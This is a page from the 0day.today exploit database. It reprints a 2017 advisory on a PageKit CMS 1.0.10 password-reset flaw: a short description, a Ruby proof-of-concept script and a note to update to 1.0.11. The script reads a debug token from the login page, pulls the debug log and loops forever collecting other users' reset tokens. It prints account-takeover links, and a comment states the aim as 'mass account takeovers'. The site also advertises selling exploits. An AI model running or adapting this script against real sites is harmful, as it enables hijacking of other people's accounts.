0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PageKit 1.0.10 - Password Reset Exploit
[# Exploit Title: Remote PageKit Password Reset Vulnerability
# Date:21-01-2017
# Software Link: http://pagekit.com/
# Exploit Author: Saurabh Banawar from SecureLayer7
# Contact: http://twitter.com/securelayer7
# Website: https://securelayer7.net
# Category: webapps
1. Description
Anyremote user can reset the password by reading the debug log, the exploit
can be successfully executed, if the debug option is enabled in the Pagekit
CMS.
CMS Pentest report can be found here:https://securelayer7.net/
download/pdf/SecureLayer7-Pentest-report-Pagekit-CMS.pdf
2. Proof of Concept
require 'net/http'
#Enter the domain/IP address of the site for which you want to test this vulnerability
vulnerableSite = 'http://127.0.0.1'
loopCount = 0
while loopCount == 0
#We request the Login page which has the debug parameter
url = URI.parse(vulnerableSite + '/pagekit/index.php/user/login')
request = Net::HTTP::Get.new(url.to_s)
resp = Net::HTTP.start(url.host, url.port) {|http|
http.request(request)
}
#The response is received and is sent to many regular expression to find the value of _debug parameter from its HTML source code
bodyOfResponse = resp.body
myArray1 = bodyOfResponse.split(/"current":"/)
outputOfMyArray1 = myArray1[1]
myArray2 = outputOfMyArray1.split(/"};/)
theSecret = myArray2[0]
puts ""
puts "The secret token to debug link is: #{theSecret}"
puts ""
url = URI.parse(vulnerableSite + '/pagekit/index.php/_debugbar/' + theSecret)
request = Net::HTTP::Get.new(url.to_s)
resp = Net::HTTP.start(url.host, url.port) {|http|
http.request(request)
}
resp.body
initial = resp.body
#The count of number of victim users is found out
users = initial.scan(/user=.+?(?=")/)
c = users.count
e = c.to_i
#If the count is 0 then we continuosly monitor it
if c == 0 then puts "Currently no user has clicked on reset password like."
puts ""
puts "Trying again..."
puts ""
puts ""
#If the count is greater than 0 then it means we found a victim. So, find the password reset link and display it in the console
else
link1 = vulnerableSite + "/pagekit/index.php/user/resetpassword/confirm?user="
link2 = "&key="
i = 0
while i<e
securityToken = ''
a = real[i]
b = a.split('=')
c = b[1]
d = c.split('\\')
victimUserName = d[0]
puts "The victim is: #{victimUserName}"
f = b[2]
securityToken = f.scan(/[^\\]/)
securityTokenFiltered = securityToken.join
puts "The security token of victim is: #{securityTokenFiltered}"
puts "Link for account takeover"
puts "#{link1}#{victimUserName}#{link2}#{securityTokenFiltered}"
puts ""
puts ""
i += 1
end
end
# This loop runs forever because we want to continuosly monitor who is requesting a password reset and who has clicked on the link so that
# we can perform mass account takeovers
end
3. Solution:
Update to version 1.0.11
https://github.com/pagekit/pagekit/releases/tag/1.0.11
# 0day.today [2024-11-16] #